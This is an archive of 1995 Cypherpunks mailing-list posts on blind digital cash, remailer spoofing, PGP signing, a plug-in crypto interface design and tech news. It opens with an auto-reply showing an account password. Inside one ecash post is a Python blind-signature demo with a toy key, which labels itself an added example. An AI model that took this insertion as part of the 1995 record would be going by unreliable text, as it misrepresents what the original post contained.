This is an automatic response to your request for a free user account on the RealAudio site. Welcome to the world of RealAudio. Please do the following:

1. Go to http://www.RealAudio.com/welcome.html
2. Enter the following:
   Username: cpunks
   TEMPORARY Password: New.Norfolk
3. Choose your personal, PERMANENT password for the World of RealAudio

If you have trouble with the software, please refer to the RealAudio FAQ and Technical Notes available at http://www.RealAudio.com/help.html

You can also contact us through http://www.RealAudio.com/comments.html

Thanks for using RealAudio!

Progressive Networks, Seattle, Washington, USA

From jimbell at pacifier.com Fri Nov 17 19:56:28 1995
From: jimbell at pacifier.com (jim bell)
Date: Sat, 18 Nov 1995 11:56:28 +0800
Subject: e$: Come aaaannnndddd Get it!
Message-ID:

>jim bell writes: [re: payee anonymity]
>> It seems to me that this should be possible, within limits, if the potential
>> payee could generate a "blinded" note to be delivered to the payer by
>> anonymous means. The payer could get the note certified by the bank,
>> possibly given an extra "blind" if necessary (is this possible? Desirable?
>> Why not?) and then the resulting still-blinded but certified note is posted
>> (in encrypted form, I supposed) to the 'net so that only the payee can
>> decrypt and unblind it.
>
>This sounds like a version of "Hey, I'll pay you $10, if you give me a ten
>dollar bill first." As I understand your protocol, Bob gives Alice an enote,
>then Alice gives Bob an enote. Alice isn't paying Bob in any meaningful sense,
>since Bob ends up with the same amount of e$ with which he started. Perhaps
>you could clarify what you meant.

It sounds like you understand even less about the details of digital cash than I do. First, read the August 1992 issue of Scientific American, the article by David Chaum. He explains, with a certain amount of detail, how blinded digital cash operates. To become validated and worth money, it first has to be electronically "written," blinded, and then signed by the bank. Then it is unblinded, at which point it can be spent.

What I was saying is that the notes would be written by the payee, then blinded by the payee, given to the payer, and then signed by the payer's bank. At this point, they are worth money, and they are then returned to the payee, possibly by encrypting them and publishing them in encrypted form on a publicly-accessible portion of the Internet, so "anyone" could read them. Only the intended payee would be able to decrypt them, however, and only the payee would be able to unblind the notes.
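The payee-written, payee-blinded flow described in the message above, as an added example that is not part of the original post or of any ecash implementation. It assumes a textbook RSA blind signature, a constructed toy bank key built from two known Mersenne primes, and hypothetical function names; the encrypted return path to the payee is not modelled.

```python
"""Payee writes and blinds a note, the payer's bank signs it, the payee unblinds."""
import hashlib
import secrets
from math import gcd

# Constructed toy bank key (assumption): two known Mersenne primes. Far too
# small and too structured for real use; chosen so the example runs offline.
P, Q = 2**61 - 1, 2**89 - 1
N = P * Q                                  # bank's public modulus
E = 65537                                  # bank's public exponent
D = pow(E, -1, (P - 1) * (Q - 1))          # bank's private exponent


def note_digest(note: bytes) -> int:
    """Map the note text into Z_N; stand-in for a proper full-domain hash."""
    return int.from_bytes(hashlib.sha256(note).digest(), "big") % N


def payee_blind(note: bytes):
    """Payee: pick a secret factor r and hide the note as m * r^E mod N."""
    m = note_digest(note)
    while True:
        r = 2 + secrets.randbelow(N - 2)
        if gcd(r, N) == 1:                 # r must be invertible mod N
            break
    return (m * pow(r, E, N)) % N, r       # blinded value goes out, r stays home


def bank_sign(blinded: int) -> int:
    """Payer's bank: debit the payer, then sign the opaque value it was given."""
    return pow(blinded, D, N)


def payee_unblind(blind_sig: int, r: int) -> int:
    """Payee: divide out r. (m * r^E)^D = m^D * r, so the result is m^D."""
    return (blind_sig * pow(r, -1, N)) % N


def verify(note: bytes, sig: int) -> bool:
    """Anyone holding the bank's public key can check a note at deposit time."""
    return pow(sig, E, N) == note_digest(note)


def run_exchange(note: bytes) -> dict:
    """Walk payee, payer and bank through one payment; record what each saw."""
    blinded, r = payee_blind(note)         # payee -> payer, by anonymous means
    blind_sig = bank_sign(blinded)         # payer -> bank -> payer
    sig = payee_unblind(blind_sig, r)      # payer -> payee, who unblinds
    return {
        "bank_saw": blinded,
        "payer_saw": (blinded, blind_sig),
        "note_digest": note_digest(note),
        "signature": sig,
        "deposit_ok": verify(note, sig),
        # The value relayed back by the payer is not a signature on the note;
        # without r it cannot be turned into one.
        "relayed_value_spendable": verify(note, blind_sig),
    }


if __name__ == "__main__":
    # Constructed sample note; the field layout is an assumption.
    for key, value in run_exchange(b"serial=CONSTRUCTED-0001;value=10").items():
        print(f"{key}: {value}")
```

The bank's signing record holds only `bank_saw`, which differs from the digest presented at deposit, so the signing and the deposit cannot be matched from the bank's side.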
From anonymous-remailer at shell.portal.com Fri Nov 17 20:01:46 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sat, 18 Nov 1995 12:01:46 +0800
Subject: Ecash account
Message-ID: <199511180326.TAA18869@jobe.shell.portal.com>

On Fri, 17 Nov 1995 don at cs.byu.edu wrote:

> So who here is going to use their ecash account to set up a money
> lau^H^H^Hexchange service?

Oh boy. Not this argument again. The one that says that if someone makes "change" that it's money laundering. *Sigh*

I suppose it is, if that's the way you're going to look at it. On that basis, every time I go to the corner grocery, I'm "laundering" my money. So be it.

And I suppose if I put aside a small "nestegg", that then I've got something to hide as well??

> Ob Cyphernoise: Would Dr Fred, Alice, and any other names LD has set up
> for himself lately please keep the noise limited to email? Please?

I too am tired of LD spoofing me. But I am not going to actively "deny" every one of his posts. It's just not worth it. Hopefully the people on this list can tell the difference between what I stand for, and what certain people would like to paint me as standing for.

As I've said, and repeated, my only interests lie in E-cash, and in removing code from the Internet which opens up security holes. Software, like Netscape Navigator and Java.

The rest ... or anything else that someone tries to paint me as "standing for" is simply juvenile antics.

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.

C. S. U. M. O. C. L. U. N. E.

From attila at primenet.com Fri Nov 17 20:10:38 1995
From: attila at primenet.com (attila)
Date: Sat, 18 Nov 1995 12:10:38 +0800
Subject: rape in the gulch (was Noyce and Intel)
In-Reply-To: <199511172211.RAA12522@pipe3.nyc.pipeline.com>
Message-ID:

that's why we call them vulture capitalists. I know a few who would sell their own mother, several times, even after she died.
I think Rock, Perring, the Davises, and a few more were gentlemen; but, as a group they certainly do not deserve much respect after each pact they make with the devil. Once the big banks and insurance funds started supplying the underlying capitalization, the whores really moved in and made it what I refer to as evil money. you don't need to believe the New World Order is calling the shots to see where the banks are coming from.

On Fri, 17 Nov 1995, John Young wrote:

> Worth magazine of Dec/Jan has a lubricious article on "The
> Super Investors of Silicon Valley":
>
>
> " 'Rise of the Silicon Patriots,' by Donald Katz. If their egos
> and paychecks are oversized, so is their impact on the economy
> and culture. It's not for nothing that California's venture
> capitalists think they're at the center of the universe."
>
>
> It traces some of the mauling by rapacious VC tigers of unwary
> techno-bambis and gleefully vaunts winner-take-all when the
> chips are down (multiple puns there) -- commensurate with the
> flatulent flattering flummoxing of this "financial
> intelligence" oilslicker.
>
>
> For more FFF FinInt organ-grinding the monkeys, see
> "Downloading Warren Buffet's Brain."
>
>
>

From dsmith at midwest.net Fri Nov 17 20:28:36 1995
From: dsmith at midwest.net (David E. Smith)
Date: Sat, 18 Nov 1995 12:28:36 +0800
Subject: [NOISE] Review: GoldenEye
Message-ID: <199511180406.XAA18908@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Just got back from the new Pierce-Brosnan-as-007 flick. It had a few typical "hacker" stereotypes, and a couple of interesting crypto relevant references.

* Boris, the stereotypical hacker, was hacking through American banks. A screen had the words "Department of Justice" and the DoJ logo; underneath were the words "Clipper Chip" and a list of banks.
* The archvillain's plan involved a massive money transfer and an EMP pulse; he very briefly explained the effects of what would happen if every computer in London were rendered non-functional. Possible crypto-anarchy bits.
* Boris should learn the value of strong passphrases. His password for the massive mainframe which will be used in the archvillain's scheme is a five-letter dictionary word, which didn't change (and it was used on two different computers), and he revealed it indirectly (it was a word puzzle).
* A few on-computer-screen references to "encryption".
* Boris and the mastermind kept bantering about "breaking codes."
* Boris' computer in Russia - in his apartment - has a domain ending in ".comp.math.edu"; when his screen lights up with the words "INCOMING EMAIL" he goes into a live chat (complete with graphics).

Above-average action/adventure flick. The technical mistakes are forgivable in the interest of dramatic license. Don't watch it for the techno/crypto bits, though. Watch it because lots of things blow up :)

Dave
-----
David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745
+1(314)339-3814, "dsmith at midwest.net", PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith/

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMK1btCoZzwIn1bdtAQFmOgF/ZLYc3sT1L5sQS+wqmS5U6wsx9jL86job
Ie6DU65FIuSZF6vFDBDNZFxZxs0HuaR6
=5PGz
-----END PGP SIGNATURE-----

From jimbell at pacifier.com Sat Nov 18 14:36:10 1995
From: jimbell at pacifier.com (jim bell)
Date: Sat, 18 Nov 95 14:36:10 PST
Subject: protecting against impersonation (was: CANADIAN PRESS REPORTS)
Message-ID:

>anonymous writes:
>> I still feel such a sense of violation with what LD did, such an
>> utter sense of helplessness at the character assassination I've
>> suffered at his hands,
>
>So use PGP, sign your messages. Simple solution.

Absolutely! Anybody who uses anonymous remailers to post to public areas, and does not use digital signatures to prevent spoofing when it is obviously needed, is a fool or worse.

From aleph1 at dfw.net Sat Nov 18 00:32:04 1995
From: aleph1 at dfw.net (Aleph One)
Date: Sat, 18 Nov 1995 16:32:04 +0800
Subject: SA: Confidential Communication on the Internet
Message-ID:

On the December issue of Scientific American there is an article by Thomas Beth, "Confidential Communication on the Internet". Lite on the technical side but good reading anyway.

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

From raph at c2.org Sat Nov 18 00:57:26 1995
From: raph at c2.org (Raph Levien)
Date: Sat, 18 Nov 1995 16:57:26 +0800
Subject: Design proposal: crypto-capable generic interface
Message-ID: <199511180842.AAA06560@infinity.c2.org>

Hi to cypherpunks who write code,

The recent discussion of "plug-in" crypto is reminding me of some design work I did earlier this year. This post presents the motivation and some of the details of that design, slightly updated.

First, a few words about what I consider to be a good interface that can support plug-in crypto. It has to support both email and the Web; I feel that everything else follows.
It should support completely transparent integration, by which I mean no extra clicking or commands or anything like that. Finally, it should be generic in that it will support a number of other plug-in applications besides cryptography. Two specific applications which interest me are file format conversions and external-body resolving.

The design is based partly upon .mailcap, which is perhaps the best example of a generic interface we have today. However, while .mailcap is a nice interface for popping up windows to present semi-interesting multimedia types, it certainly cannot support transparent cryptography. I feel that its primary weakness is the inability to support MIME to MIME rewriting. However, .mailcap has some good ideas which are worth stealing.

For the purposes of this proposal, I will assume that all objects are MIME encapsulated. I think that's a reasonable assumption, as it handily covers all cryptographic protocols that have any hope of surviving.

I will propose my design at a very high level. Please forgive me for leaving out the juicy details.

I propose that the new interface lives as a sort of daemon, rather than a static collection of command line script pieces. A reasonable way for applications to talk to the daemon would be Unix domain sockets, or whatever the equivalent is on Mac and Windows platforms. There should be a simple protocol for automatically starting up a daemon if there isn't one already running.

The first part of the interface is the negotiation. The daemon tells the application what MIME types it can understand (this part is very similar to the .mailcap file, but doesn't include the corresponding command lines). In reply, the application tells the daemon what MIME types it can understand (this is like the Http-Accept: field in HTTP).

Once the negotiation has been established, the application can send the daemon MIME objects that the app does not understand but the daemon does (for example, an image/fractal).
The daemon can return a MIME object that the app does understand (for example, an image/ppm).

Alternatively, the daemon may request an authentication. This is useful when resolving external bodies that require authentication, including non-anonymous FTP, and standard authenticated HTTP. In this case, the daemon sends a message to the app requesting the authentication. It specifies whether it needs both username and password, or just password. In the latter case, it hands a username to the application. The application can then query the user for the authentication data. It hands this back to the daemon. In reply, the daemon indicates success or failure. In case of success, it hands the object back to the app.

I'm quite pleased with this protocol as outlined. It's fairly simple, which means it might actually get implemented. It's also easy to see that it does exactly what you want for file format conversions, external body resolving, and decryption of encrypted messages.

Encryption is a bit more tricky, but in essence you just hang a premail-alike off this kind of protocol. The hard part is specifying the key, but you just call it a "parameter" and put in hooks for the daemon to ask for whatever parameters it needs. This requires that keys have some nonforgeable names, which is unfortunately not a feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the Certification Authority ( at Nick Szabo).

One final aside: I've been fairly frustrated with this mailing list as a forum for talking about real design proposals and implementation issues. Ignorant posts by the likes of Dr. Fred and Alice d'Clueless tend to attract far more attention than real crypto work. I want a forum for, and just for, cypherpunks who write code. If I had just a smidgen more free time (as if), I'd be trying to start one myself. Anyone else?
Raph

From dl at hplyot.obspm.fr Sat Nov 18 01:06:57 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Sat, 18 Nov 1995 17:06:57 +0800
Subject: Ecash account
In-Reply-To: <199511170930.CAA00682@wero.byu.edu>
Message-ID: <9511171032.AA10628@hplyot.obspm.fr>

don at cs.byu.edu writes:
> So who here is going to use their ecash account to set up a money
> lau^H^H^Hexchange service?

I have one, sort of, the rates are quite high though, It's my casino, ( http://www.box.eu.org/~dl/inc/play.shtml ) [If you play an infinite number of times, you will have statistically received 89% of what you've bet. So it's an 11% fee exchange service somehow :-)]

For obvious reasons, it works only with CyberBucks though...

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept
Greenpeace Ortega Marxist Qaddafi Chirac Soviet domestic disruption

From drcharpe at hamlet.uncg.edu Sat Nov 18 02:59:41 1995
From: drcharpe at hamlet.uncg.edu (Daniel 'genius' Charpentier)
Date: Sat, 18 Nov 1995 18:59:41 +0800
Subject: WRITTEN CODE
Message-ID:

In Raph Levien's Subject : Design proposal : crypto-capable generic interface he mentioned his desire to see more cryptographic program code and I didn't want to see this initiative die. I am a newcomer to cryptography and I know I shouldn't be posting yet but that is what I thought cypherpunk postings was supposed to be in the first place ( program code, protocols, and algorithms ). Please don't flame me too badly for this message. I am doing everything I am supposed to before posting ( reading the FAQ's, the entire cypherpunk archive, and APPLIED CRYPTOGRAPHY by Bruce Schneier ) but I could not let this slip by. Let's talk more about the cryptographic algorithms, program code, and chips than politics.
I hope this did not upset too many people

From adam at lighthouse.homeport.org Sat Nov 18 07:02:54 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Sat, 18 Nov 1995 23:02:54 +0800
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <199511180842.AAA06560@infinity.c2.org>
Message-ID: <199511181441.JAA02040@homeport.org>

Raph Levien wrote:

| I propose that the new interface lives as a sort of daemon, rather
| than a static collection of command line script pieces. A reasonable
| way for applications to talk to the daemon would be Unix domain
| sockets, or whatever the equivalent is on Mac and Windows
| platforms. There should be a simple protocol for automatically
| starting up a daemon if there isn't one already running.

A daemon per user, or per machine? Either way, I think you run into problems on a big multi-user machine. (Either it's an extra process or two per person, or it's a great target for attack & subversion.)

It's an interesting proposal, but let me ask you this--Why is it better than a libpgp (or pgp.dll) that offers a variety of services to programs at multiple levels (ie, offers full one call RSA/IDEA encryption and compression, as well as ascii armoring, or offers each of those as a separate function)?

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From adam at lighthouse.homeport.org Sat Nov 18 07:05:22 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Sat, 18 Nov 1995 23:05:22 +0800
Subject: CSE gets flak on TV
In-Reply-To: <199511180300.TAA16642@jobe.shell.portal.com>
Message-ID: <199511181446.JAA02056@homeport.org>

If you want us to believe you didn't write it, publish a key, and consistently use it to sign messages. Incidentally, this also lets us reliably filter you. :)

| Alice here (the real one) ...
|
| I think that this "writer" who felt that it was desirable to attach MY
| name to this drivel deserves a good flogging.

Adam
(Or someone cleverly forging posts in my name.)
--
"It is seldom that liberty of any kind is lost all at once." -Hume

From s1113645 at tesla.cc.uottawa.ca Sat Nov 18 07:56:33 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Sat, 18 Nov 1995 23:56:33 +0800
Subject: WRITTEN CODE
In-Reply-To:
Message-ID:

On Sat, 18 Nov 1995, Daniel 'genius' Charpentier wrote:

> he mentioned his desire to see more cryptographic program code and
> I didn't want to see this initiative die. I am a newcomer to
> cryptography and I know I shouldn't be posting yet but that is

Don't be shy: POST! If you've got good coding ideas, then by all means we want to hear you. If you've got lousy ideas but good intentions, the fastest way on the net to get corrected is to post a mistake :-) . Nobody will flame you for that, so don't be so touchy.

> what I thought cypherpunk postings was supposed to be in the first
> cryptographic algorithms, program code, and chips than
> politics.

Some of us codewriters are far lazier than others on the list, political discussion seems to take less effort and is the lowest common denominator (too bad, but then I'm guilty; snore...).

> I hope this did not upset too many people

Hardly. Don't worry about it, besides, killfiles exist. I agree wholeheartedly too, I'd love to see more crypto code and protocol discussion. I must point out though, that the quality you get is related to the quality you give, if you post crypto code/protocol material (I'm too lazy for that, right now...), that's what the debate will shift to. Kind of like "Build it and they will come." (Field of Dreams?).

Curious, where is uncg.edu? Your French name doesn't make me think you're in the States (as an .edu address might suggest, but then not necessarily either). (univ of Calgary?)

Bonne fin de semaine.
From aba at atlas.ex.ac.uk Sat Nov 18 08:09:02 1995
From: aba at atlas.ex.ac.uk (aba at atlas.ex.ac.uk)
Date: Sun, 19 Nov 1995 00:09:02 +0800
Subject: protecting against impersonation (was: CANADIAN PRESS REPORTS)
Message-ID: <29172.9511181558@exe.dcs.exeter.ac.uk>

anonymous writes:
> I still feel such a sense of violation with what LD did, such an
> utter sense of helplessness at the character assassination I've
> suffered at his hands,

So use PGP, sign your messages. Simple solution.

> that I feel that I must take some token action to "set the record
> straight". Something which clears my name.

This post wasn't signed off, but I presume you are "Alice d'nonymous", it would help lots if you could get yourself an account with a nym server, such as alpha at c2.org. That would have the advantages that your email address would be recognizable, and that people could reply to you if they wanted to.

If having a working reply address bothers you, well at least sign your posts, if you're concerned about a persistent identity, the tools are available to do it.

Complaining about things which have simple technological solutions won't get you much sympathy.

Adam

From sandfort at crl.com Sat Nov 18 08:25:08 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Sun, 19 Nov 1995 00:25:08 +0800
Subject: Give us your wired, your poor, your HTML hacker, yearning to web , freely (fwd)
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

S'punks,

Anyone need a job in the Bay Area? I think a Cypherpunk would be ideal for this job.

S a n d y
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---------- Forwarded message ----------
Date: 17 Nov 95 17:29:42
From: Steve Gibson
To: Friends of Bionomics
Subject: Give us your wired, your poor, your HTML hacker, yearning to web freely

Dear Friends,

We need help.
We need a combination web-cultivator, researcher, editor, conference assistant and Notes/Mac wizard. In sum, a typical entrepreneurial utility infielder.

Finding people who comfortably straddle the worlds of public policy and high technology can be tricky. We look to you, as someone familiar with The Bionomics Institute, for assistance in this key search. (After all, this one hire represents a 33% increase in our staff.)

If you know of such a person, please get the following information to them, or get them in touch with us.

Thanks,
Steve

* * * * * * * * * * * * * * * * * * * * * * * * *
JOB OPENING
* * * * * * * * * * * * * * * * * * * * * * * * *

WHO WE ARE
The Bionomics Institute is a non-profit educational foundation (aka Think Tank) dedicated to replacing the conventional mechanistic model of the economy with a living, ecosystem one, as described in Michael Rothschild's book .

QUALIFICATIONS
Must be comfortable (1) all over the WWW, and inside the HTML of our web site, and (2) researching economics, technology, history, biology, public policy and ??? using libraries, on-line data sources, phone calls and brainpower, and 3) familiar with free-market thinking.

JOB DESCRIPTION
(1) Nurture Institute web site.
(2) Provide primary research support for free-market think tank/high-tech columnist.
(3) Maintain research library.
(4) Assist in general operations of Institute, including conferences, etc.
(5) etc.
(6) see 5.

ORGANIZATIONAL CULTURE
Informal but intense work environment, self-starters only. Teamwork and communication trite but very necessary. Technical knowledge must be matched with broad interests and strong English skills. Small staff, medium salary, large hours.

IF YOU MADE IT THIS FAR
Do your research on Bionomics (www.bionomics.org would be a good place to start), then email resume to Research at bionomics.org.
(November 17, 1995)

Steve Gibson, Executive Director, The Bionomics Institute, 415/454-1000, www.bionomics.org

From dlv at bwalk.dm.com Sat Nov 18 08:54:01 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 19 Nov 1995 00:54:01 +0800
Subject: WRITTEN CODE
In-Reply-To:
Message-ID:

s1113645 at tesla.cc.uottawa.ca writes:

> On Sat, 18 Nov 1995, Daniel 'genius' Charpentier wrote:
>
> > he mentioned his desire to see more cryptographic program code and
> > I didn't want to see this initiative die. I am a newcomer to
> > cryptography and I know I shouldn't be posting yet but that is
>
> Don't be shy: POST! If you've got good coding ideas, then by all
> means we want to hear you. If you've got lousy ideas but good intentions,

Amen. If you have something crypto-relevant to post, please do. As the amount of noise on this list rises, the meaningful discussion goes away. Please help reverse this trend.

> the fastest way on the net to get corrected is to post a mistake :-) .
> Nobody will flame you for that, so don't be so touchy.

Or if some anal-retentive jerk flames you, ignore him. Even if you make a naive mistake in your post, and someone corrects it, both you and probably other readers of this list will learn from it.

> Bonne fin de semaine.

Curious how in qc they say 'fin de semaine' while in France proper everybody says 'weekend'.

---
Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From dlv at bwalk.dm.com Sat Nov 18 08:54:16 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 19 Nov 1995 00:54:16 +0800
Subject: Oracle's "internet terminal"
Message-ID:

The recent issue of _Computer Reseller News_ has a couple of items on the "internet terminal" being readied by Oracle. I'll quote a couple of crypto-relevant excerpts:

1. Interview with Larry Ellison (Oracle Corp's Chairman/CEO)

Q. How far along are you in the development of the $500 Internet Network Terminal?

A.
We'll be delivering the prototype machines this year with full production in the third quarter next year.

...

Q. Will you release Application Programing Interfaces for the Oracle browser and server?

A. We will use industry-standard APIs that are accepted by everybody, not Microsoft-proposed APIs.

...

Q. What differentiates the Oracle Web products from competitive offerings in terms of pricing and technology?

A. There will be standard Web payment schemes. We'll use them, as will everybody else. We won't differentiate ourselves on basic payment schemes. The thing that will differentiate us is security protocols, the ability to use text processing, database processing, video processing, our video server technology and our powerful client.

2. Ellison's field of dreams - $500 PC (by Ken Yamada)

...

Oracle's chairman and chief executive, Lawrence Ellison, previewing his latest futuristic vision at a trade show last month in Geneva, said Oracle is developing the computer and that it will be shown early next year.

The desktop version of the new system, called a "network computer" and referred to as an "NC" rather than a PC, is expected to sell for about $500 and will use Internet servers to do the bulk of its computing. Basic hardware will include an inexpensive microprocessor, a small amount of memory, a monitor and a keyboard, but the device will lack storage and software.

[I guess, they mean no permanent storage or software other than the browser in ROM. No remembered state, no viruses... -DV]

...

The Redwood Shores, Calif., company is developing the computer's operating system and technical design, but the unit will be produced by hardware manufacturers, said Farzad Dibachi, an Oracle senior vice president.
While Dibachi would not name specific manufacturers, he explained that Oracle's participation in the device's technical development was similar to the role it played in developing a digital television set-top box with Apple Computer, which produced the box's hardware.

...

Oracle plans to sell software that turns World Wide Web sites essentially into central processing units for the new computers.

...

"If computing is to go to the masses and we're doing electronic commerce," said Dibachi in a telephone interview from Geneva, "you have to have devices that are simpler."

Oracle's Laursen said he expects that eventually many different companies will manufacture the devices, which he described as an entire line of products encompassing two-way pagers, intelligent telephones, mobile computers, desktop systems and television set-top boxes. Each of these devices would rely on the Internet to do its core processing work.

He said he expected Oracle to develop as many as 50 working prototypes by early next year.

...

Oracle also plans to leverage its wireless communications software products and give some of the devices wireless capabilities.

"We're still trying to figure out what processor to put in," Laursen said. Under consideration are chips from Mips Technologies and Motorola Inc.

---
Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From tcmay at got.net Sat Nov 18 08:59:46 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 19 Nov 1995 00:59:46 +0800
Subject: WRITTEN CODE
Message-ID:

At 10:51 AM 11/18/95, Daniel 'genius' Charpentier wrote:

>I didn't want to see this initiative die. I am a newcomer to
>cryptography and I know I shouldn't be posting yet but that is
>what I thought cypherpunk postings was supposed to be in the first
>place ( program code, protocols, and algorithms ).
Please don't
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

The list is about several things, some of which overlap the topics routinely discussed in sci.crypt and sci.crypt.research.

Algorithms, code, etc. _does_ get discussed a lot, as you'll surely see as you peruse the archives. Volume-wise, it is a drop in the bucket. But this is not surprising, as primarily mathematical questions and answers tend to be brief. (You'll see this in the many one-line answers to questions about cryptographic algorithms....)

Also, technical questions tend to have precise answers, usually with answers in the various crypto texts and proceedings of the Crypto and EuroCrypt conferences. And technical questions which _don't_ have simple answers in the texts tend of course to be _research_ questions, and the dynamics mitigate against lively discussion until some progress is made.

The social, political, and economic aspects are seldom discussed adequately elsewhere, and one thing the Cypherpunks group has really led in is the discussion of digital money, anonymous systems, pseudonyms, reputation, markets, and a host of other such topics. These topics can border on pure politics if people are not careful, but are generally close to the topics discussed at the first meeting over three years ago, before there was even a mailing list.

>flame me too badly for this message. I am doing everything I am
>supposed to before posting ( reading the FAQ's, the entire
>cypherpunk archive, and APPLIED CRYPTOGRAPHY by Bruce Schneier )
>but I could not let this slip by. Let's talk more about the
>cryptographic algorithms, program code, and chips than
>politics.

So, go ahead and talk. I mean this seriously, not sarcastically. No one will chastise you or anyone else for discussing technical cryptography. There are obviously folks interested in this. Experts, even. Published experts, even.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tao at presence.lglobal.com Sat Nov 18 09:06:11 1995 From: tao at presence.lglobal.com (The Anarchives) Date: Sun, 19 Nov 1995 01:06:11 +0800 Subject: pgp on bsdi 2.0 Message-ID: Hi, I'm having trouble getting pgp compiled on bsdi 2.0. Can someone who has successfully done this please email me with some help :) thanx http://www.lglobal.com/TAO/ From wwwziff at internet.com Sat Nov 18 10:17:22 1995 From: wwwziff at internet.com (ZD Net / World Wide Web Edition) Date: Sun, 19 Nov 1995 02:17:22 +0800 Subject: ZD Net Update v.1 #2 Message-ID: <199511181755.MAA22495@yipee.internet.com> __________________________________ZD Net Update_______________________________ v. 1 #2 11-13-95 Welcome to ZD Net Update, the free E-mail newsletter created especially for registered users of Ziff-Davis Interactive's ZD Net/World Wide Web edition. ZD Net Update is a bi-weekly bulletin that alerts you to new and exciting developments on ZD Net. 
In this issue: > ZD NET COMDEX/FALL '95 COVERAGE KICKS OFF > ZIFF-DAVIS PREMIERES ZD INTERNET LIFE ON THE WORLD WIDE WEB > TRUE INTERACTIVE REALITY ARRIVES ON ZD NET > ANNOUNCING SNAP SOLUTIONS TO COMPLEX PROBLEMS > MEASURE THE HEALTH OF THE NET WITH THE INTERNET INDEX * * * * * * * * * * ZD NET COMDEX/FALL '95 COVERAGE KICKS OFF Comdex/Fall: It's been called the Greatest Show on Earth, and for good reason. All this week the ZD Net Special Report http://www.zdnet.com/~zdi/comdex/filters/main.html will provide continuous updates from the trade show, complete with daily news updates, expert commentary, and Live Chats. Follow PC Magazine's Technical Excellence Awards, cybercast as a virtual 3D world. Get the skinny from PC Week's Spencer F. Katt party. And learn all about the new products that have attendees buzzing. For all the sights and sounds of the show, ZD Net is the place to be. * * * * * * * * * * ZIFF-DAVIS PREMIERES ZD INTERNET LIFE ON THE WORLD WIDE WEB This month marks the debut of ZD Internet Life (http://www.zdnet.com/zdil/), the first interactive magazine designed from the ground up around a Web site. Combining a magazine, a Web site, and a CD ROM, ZD Internet Life is focused on using the Internet for fun, profit, and personal growth. The editorial staff is headed by Bill Machrone, ZD Internet Life's Editor-in-Chief, Ziff-Davis's Vice President of Technology, and one of computer journalism's most respected stars. It also includes Web doyenne Angela Gunn and Associate Editor Lisa Holzer. Together with expert reviewers, ZD Internet Life's staff picks "The Best" sites and provides a top-to-bottom listing of "The Rest" of the sites that address a given topic under the categories of fun, profit, and personal growth. Readers who visit the Web sites will be able to add their opinions to an online database of site reviews. The content of the Web site is a superset of what will appear in the magazine and on the CD ROM. 
In the words of the ZD Internet Life editors, "ZD Internet Life is a Web site with an accompanying magazine. In other words, what you see right here is a lot like what you'll see on your local newsstand three months from now. Make sense? Welcome to the future of publishing." * * * * * * * * * * TRUE INTERACTIVE REALITY ARRIVES ON ZD NET Blast off into the future with ZD3D (http://www.zdnet.com/~zdi/vrml), a new interactive virtual reality area on ZD Net. Designed to serve as the preeminent source for interactive virtual reality on the Internet, ZD3D provides users with a rich and evolving virtual reality site, direct access to other 3D Web sites, and a wealth of news, events, articles, and commentaries focusing on virtual reality. ZD3D's design is based on Virtual Reality Modeling Language (VRML), a technology standard created by Tony Parisi and Mark Pesce that makes 3D environments on the Internet accessible through a standard PC. Users will feel as if they're actually strolling around 3D Web sites at will, obtaining information in the form of graphical, three-dimensional metaphors. In building the area, ZDI obtained the support of both Pesce and Parisi, who will contribute exclusive VRML commentaries and updates to ZD3D. In addition, Parisi helped ZDI build the ZD3D site through Intervista Software, his VRML technology and consulting firm. When ZD Net users click on ZD3D, they're given several options, including hot news; Parisi and Pesce's commentaries; the WorldView VRML browser from Intervista Software and other VRML browsers; and Terminal Reality, ZD3D's interactive virtual reality experience. The WorldView browser can be downloaded for free, enabling users to access the Terminal Reality world and launch to the other 3D Web sites available there. Once in, users navigate through a virtual airport, complete with departure gates to other interactive 3D Web sites, a central newsstand, and advertisements on walls and vehicles. 
